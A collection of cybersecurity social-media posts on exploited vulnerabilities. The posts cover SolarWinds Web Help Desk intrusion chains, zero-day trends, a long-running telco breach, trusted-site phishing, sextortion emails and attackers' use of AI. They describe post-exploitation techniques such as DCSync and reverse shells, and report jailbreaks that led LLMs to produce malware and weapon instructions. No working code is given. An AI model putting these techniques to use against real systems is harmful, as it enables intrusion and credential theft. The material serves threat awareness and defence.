How Cybercriminals Exploit Security Vulnerabilities

INTRUSION PATTERN: SUPPLY CHAIN SOFTWARE AS A SINGLE-POINT INITIAL ACCESS VECTOR VIA UNAUTHENTICATED RCE ℹ️ Researchers have observed active, in-the-wild exploitation of SolarWinds Web Help Desk (WHD), a widely deployed IT service management solution, being used as the initial access vector in sophisticated intrusions. ℹ️ This isn’t just theoretical risk. Attackers are exploiting WHD vulnerabilities to gain footholds in enterprise networks and escalate to domain compromise. WHD is: ■ Third-party, vendor-supplied software. ■ Trusted by default once installed inside the enterprise. ■ Integrated into core IT operations (ticketing, asset management, credentials, workflows). ■ Often internet-facing and runs with elevated privileges. 📍 THREAT ACTOR BEHAVIOR INITIAL ACCESS ■ Internet-exposed WHD servers with unpatched critical vulnerabilities (notably CVE-2025-40551, CVE-2025-40536, and older CVE-2025-26399) were successfully exploited to achieve unauthenticated remote code execution (RCE). ■ Researchers cannot yet definitively attribute which specific CVE was exploited in every observed case because multiple vulnerabilities were present concurrently on impacted hosts. POST EXPLOITATION Once a foothold was established, the intruder activity included: ■ Payload execution via PowerShell and BITS to download further tooling. ■ Installation of unauthorized RMM (Remote Monitoring & Management) software, such as ManageEngine artifacts (e.g., ToolsIQ.exe). ■ Lateral movement with reverse SSH shells and RDP. ■ Persistence and privilege escalation: ◽ DLL sideloading via legitimate Windows executables. ◽ Credential theft and abuse with techniques like DCSync, reflecting domain replication attacks to extract account credential hashes. ✷ This progression shows an adversary with operational security (OPSEC) discipline, relying on living-off-the-land techniques and legitimate services to reduce detection signals. ✷ This behavior demonstrates a well-known but highly damaging scenario where one exposed and vulnerable application enables attackers to progress from initial access to full domain control. 📍 RECOMMENDATIONS ■ Patch immediately: Update all SolarWinds WHD instances to version 2026.1 or later. ■ Remove public exposure: Block access to WHD admin interfaces from the internet. ■ Credential reset: Rotate credentials for service and privileged accounts reachable from WHD. ■ Incident hunting: Look for unauthorized RMM artifacts, lateral movement activity, and abnormal identity behaviors. ■ Network segmentation: Isolate compromised hosts and employ defense-in-depth controls (e.g., segmentation, identity protection). 📌 Source: Microsoft 🔗 https://lnkd.in/dNezpRPK #solarwinds #whd #supplychain #supplychainattack #threathunting #threatdetection #threatanalysis #threatintelligence #cyberthreatintelligence #cyberintelligence #cybersecurity #cyberprotection

🚨Five Eyes Trends on Exploits: Insights from the 2023 Top Routinely Exploited Vulnerabilities Earlier this week, the cybersecurity agencies of the Five Eyes nations—the U.S., U.K., Australia, Canada, and New Zealand—issued a stark warning that highlights a new reality: zero-day vulnerabilities are becoming the “new normal” in cyber exploits. This marks a significant departure from 2022 and 2021 when older, more established vulnerabilities were most frequently targeted. Today, adversaries are increasingly exploiting freshly disclosed zero-day vulnerabilities, often within hours of discovery. The advisory reveals that many of these targeted devices (think of VPNs, SSL gateways, and remote management consoles) are on the periphery of an organization’s network. Do you recognize a trend here? 👀 These edge devices are prime targets and typically lack robust logging or agent-based monitoring capabilities. It can challenging for organizations to know when these type of devices have been pwned. Organizations frequently face a race condition with adversaries— from initial exploitation of the vulnerability, to community recognition, vendor patch release, and eventual patching by the organization. This trend underscores the importance of employing Zero Trust principles, where nothing is blindly trusted within the network. A properly architected Zero Trust and Secure Access Service Edge (SASE) approach can enable organizations to detect and block adversaries before they can cause significant compromise. The advisory explicitly encourages leveraging CISA’s Zero Trust Maturity Model (ZTMM) and the Department of Defense’s Zero Trust guidance, pushing organizations toward a resilient, secure-by-design architecture. As the UK’s NCSC CTO Ollie Whitehouse observed, this “new normal… should concern end-user organizations and vendors alike as malicious actors seek to infiltrate networks.” To combat this, network segmentation and SASE solutions can play a critical role in halting lateral movement and keeping this “new normal” in check. 🛡️ With the right architecture, organizations can mitigate risks and stop threats before they gain a foothold. Full disclosure: I am a co-author of CISA's Zero Trust Maturity Model. The Five Eyes CSA is attached. The NCSC’s website with Mr. Whitehouse’s comments is cited in the comments. #technology #softwareengineering #programming #strategy #computersecurity #cloudcomputing #informationsecurity #zscaler #riskmanagement #cybersecurity #zerotrust

New findings from OpenAI reinforce that attackers are actively leveraging GenAI. Palo Alto Networks Unit 42 has observed this firsthand: we've seen threat actors exploiting LLMs for ransomware negotiations, deepfakes in recruitment scams, internal reconnaissance and highly-tailored phishing campaigns. China and other nation-states in particular are accelerating their use of these tools, increasing the speed, scale, and efficacy of attacks. But, we’ve also seen this on the cybercriminal side. Our research uncovered vulnerabilities in LLMs, with one model failing to block 41% of malicious prompts. Unit 42 has jailbroken models with minimal effort, producing everything from malware and phishing lures to even instructions for creating a molotov cocktail. This underscores a critical risk: GenAI empowers attackers, and they are actively using it. Understanding how attackers will leverage AI to advance their attacks but also exploit AI implementations within organizations is crucial. AI adoption and innovation is occurring at breakneck speed and security can’t be ignored. Adapting your organization’s security strategy to address AI-powered attacks is essential.

The Unseen Threat: Is AI Making Our Cybersecurity Weaknesses Easier to Exploit? AI in cybersecurity is a double-edged sword. On one hand, it strengthens defenses. On the other, it could unintentionally expose vulnerabilities. Let’s break it down. The Good: - Real-time Threat Detection: AI identifies anomalies faster than human analysts. - Automated Response: Reduces time between detection and mitigation. - Behavioral Analytics: AI monitors network traffic and user behavior to spot unusual activities. The Bad: But, AI isn't just a tool for defenders. Cybercriminals are exploiting it, too: - Optimizing Attacks: Automated penetration testing makes it easier for attackers to find weaknesses. - Automated Malware Creation: AI can generate new malware variants that evade traditional defenses. - Impersonation & Phishing: AI mimics human communication, making scams more convincing. Specific Vulnerabilities AI Creates: 👉 Adversarial Attacks: Attackers manipulate data to deceive AI models. 👉 Data Poisoning: Malicious data injected into training sets compromises AI's reliability. 👉 Inference Attacks: Generative AI tools can unintentionally leak sensitive info. The Takeaway: AI is revolutionizing cybersecurity but also creating new entry points for attackers. It's vital to stay ahead with: 👉 Governance: Control over AI training data. 👉 Monitoring: Regular checks for adversarial manipulation. 👉 Security Protocols: Advanced detection for AI-driven threats. In this evolving landscape, vigilance is key. Are we doing enough to safeguard our systems?

Chinese Hackers Spent Four Years Inside Asian Telco’s Network, Exposing Critical Weaknesses in Internet Infrastructure. Oftentimes this is going on for years - decades. In a chilling example of long-term cyber infiltration, Chinese state-sponsored hackers allegedly compromised an Asian telecommunications company and remained undetected for four years, according to a report by cybersecurity firm Sygnia. The breach highlights the catastrophic consequences of failing to secure digital infrastructure—particularly domains, subdomains, and DNS servers. Sygnia’s investigation revealed the attackers used advanced persistent threat (APT) tactics, leveraging stealthy tools like the China Chopper web shell to maintain covert access. Insecure or misconfigured domains, subdomains, and DNS servers likely played a pivotal role in the intrusion. These overlooked assets often act as open doors for cybercriminals, allowing them to exploit outdated software, weak authentication mechanisms, or improperly secured file upload features. Once inside, the attackers quietly harvested sensitive data, escalated privileges, and moved laterally across networks—undetected for years. The lack of basic hygiene in DNS configurations and web application security significantly contributed to the telco’s prolonged exposure. This case underscores an urgent truth: unsecured Internet assets aren't just technical liabilities—they’re national security threats. As digital perimeters expand, threat actors are increasingly exploiting blind spots like dormant subdomains or misconfigured DNS records. Regular audits, vulnerability patching, and hardened DNS infrastructure are critical in closing these gaps. Failure to act ensures one thing: attackers will exploit the negligence—just as they did here, for four silent years. For the full article: https://lnkd.in/eYasi8ZP

Mandiant’s latest report finds that the time-to-exploit for newly disclosed vulnerabilities is now so short that exploitation often precedes patch availability. That tracks with what we observe across the broader cybercrime ecosystem: increasing sophistication driven by market incentives that reward specialization and create efficient, interoperable supply chains. Over the past five years, cybercrime has matured into a full-fledged market economy, accelerating most threat vectors—especially vulnerability exploitation. This “cybercrime supply chain” lets even less-skilled actors buy ready-made proof-of-concept exploits or simply purchase access from initial-access brokers who have already established a foothold.

The window between vulnerability disclosure and active exploitation is collapsing. Recent reports show threat actors weaponizing new vulnerabilities within 24 hours of disclosure. AI tools are compressing this timeline even further. Researcher Matt Keeley recently showed that AI models can analyze code differences between patched and vulnerable versions to produce functional exploits—sometimes before any public proof-of-concept is available. Tasks that once took days of manual review now get solved in hours. This trend regularly surfaces during offensive security engagements. Threat actors aggressively scan for the latest disclosed vulnerabilities, especially in Content Management Systems. Once initial access is gained, these systems are used for phishing infrastructure or lateral movement inside networks. The takeaway: ➡️ Traditional patch cycles are fundamentally broken compared to today's threat actors ➡️ Attack surface management needs to be continuous, not periodic ➡️ Organizations must validate security patches within hours, not days How quickly is your organization deploying critical patches—and how are you confirming that those patches are actually closing the gaps? #Cybersecurity #RedTeaming #ThreatIntelligence

⚠️ Inside Hacker’s Mind: 6 Cyber Attacks Explained Cyberattacks aren’t random. They’re strategic, calculated and increasingly sophisticated. Here’s a glimpse into some of the techniques hackers use to exploit vulnerabilities: 1. Phishing → deceives users into providing sensitive information by posing as legitimate entities. Common channels include email and social media. • Vector: Email, SMS, social engineering • Defense: User education, two-factor authentication (2FA), email filtering. 2. Ransomware → encrypts files, rendering them inaccessible. Attackers demand a ransom for decryption, often in cryptocurrency. • Vector: Phishing emails, exploit kits • Defense: Regular backups, patch management, endpoint detection, network segmentation. 3. SQL Injection → manipulates queries to access unauthorized data. • Vector: Web inputs (login forms, search bars) • Defense: Use prepared statements, validate inputs, employ web application firewalls (WAF). 4. DNS Spoofing → also known as DNS cache poisoning, this redirects users from legitimate websites to malicious ones. • Vector: Compromised DNS servers, vulnerable routers • Defense: DNSSEC, secure DNS resolvers, cache validation. 5. DoS (Denial of Service) → attacks overload a server with excessive requests, disrupting service. • Vector: Network connections, application layer • Defense: Rate limiting, traffic filtering, load balancing, DDoS mitigation. 6. XSS (Cross-Site Scripting) → injects malicious scripts into websites, allowing attackers to impersonate users or steal data. • Vector: Web forms, URL parameters • Defense: Content Security Policy (CSP), input sanitization, output encoding. 𝗜𝗳 𝗮 𝗰𝘆𝗯𝗲𝗿𝗮𝘁𝘁𝗮𝗰𝗸 𝗵𝗮𝗽𝗽𝗲𝗻𝗲𝗱 𝘁𝗼𝗱𝗮𝘆, 𝘄𝗼𝘂𝗹𝗱 𝘆𝗼𝘂 𝗸𝗻𝗼𝘄 𝘄𝗵𝗮𝘁 𝘁𝗼 𝗱𝗼? In upcoming posts, I’ll dive into practical steps you can take. _______________ 📷 Visualizing Software Engineering, AI and ML concepts through easy-to-understand Sketᵉch. I'm Nina, software engineer & project manager. Sketᵉch now has a LinkedIn Page. Join me! ❤️ #cybersecurity #it

Cybercriminals have an easy-to-use trick to bypass your security controls… It’s called living-off-trusted-sites (LOTS). And it’s LOTS of fun (I'm not sorry for this terrible joke) While it’s not a new technique by any means, it’s a new term I learned to explain this basic technique. It’s where attackers use popular and legitimate websites or applications to conduct part of their attacks. A basic example is an attacker using something like Dropbox to upload stolen files from a compromised system. But let’s look at a cool recent example that Menlo Security Inc. wrote up: 𝟭. 𝗣𝗵𝗶𝘀𝗵𝗶𝗻𝗴 𝗘𝗺𝗮𝗶𝗹: The attacker sends the victim a phishing email impersonating Amazon. The email includes a link to a Google Drawings image, which is a graphic prompting the user to verify their account because the account was “suspended” due to “unusual sign-in activity.” The graphic links to an attacker-controlled phishing site. 𝟮. 𝗩𝗲𝗿𝗶𝗳𝗶𝗰𝗮𝘁𝗶𝗼𝗻 𝗟𝗶𝗻𝗸: The malicious link is shortened with the WhatsApp URL shortener to hide the true phishing site. When the user clicks on the image, thinking they are about to verify their Amazon account, they are sent to a phishing page resembling the Amazon sign-on page. 𝟯. 𝗔𝗰𝗰𝗼𝘂𝗻𝘁 𝗩𝗲𝗿𝗶𝗳𝗶𝗰𝗮𝘁𝗶𝗼𝗻: After sending their Amazon credentials, the victim is prompted through a series of pages to provide their mother’s maiden name, date of birth, phone number, address, and credit card information. That’s a lot of information that can do a lot of damage to the victim while giving the attacker a good payday. The victim is then redirected to the legitimate Amazon login page. Using LOTS increases the likelihood that the site won’t be blocked by security software, increasing the chances that the user will click on a link in a phishing email and get through. At the same time, once the abuse is identified, those websites/SaaS applications won’t wait around to take down the malicious content. But by that time, the damage is already done.

The internet is rife with scams, and the latest involves hackers exploiting vulnerabilities in the Microsoft 365 Admin Portal to send fraudulent emails directly from legitimate Microsoft.com accounts. These emails bypass spam filters, giving them an appearance of credibility, but their true purpose is extortion. These scam emails claim to have sensitive images or videos of the recipient in compromising situations. To prevent this alleged content from being shared, the recipient is asked to pay a ransom—often in Bitcoin. This type of cybercrime, known as “sextortion,” is designed to prey on fear and desperation, making victims more likely to comply with the scammer’s demands. Unfortunately, sextortion scams are becoming increasingly common. While tech companies like Microsoft and Instagram implement protective measures, hackers find new ways to exploit technical vulnerabilities. In this case, scammers took advantage of a flaw in the Microsoft 365 Message Center’s “share” function, commonly used for legitimate service advisories. This loophole allows hackers to send emails that appear to come from a genuine Microsoft.com address, deceiving even cautious users. To identify such scams, it is crucial to evaluate the content of the email. Legitimate companies like Microsoft will never request payment in Bitcoin or other cryptocurrencies. https://lnkd.in/gts4Mg4F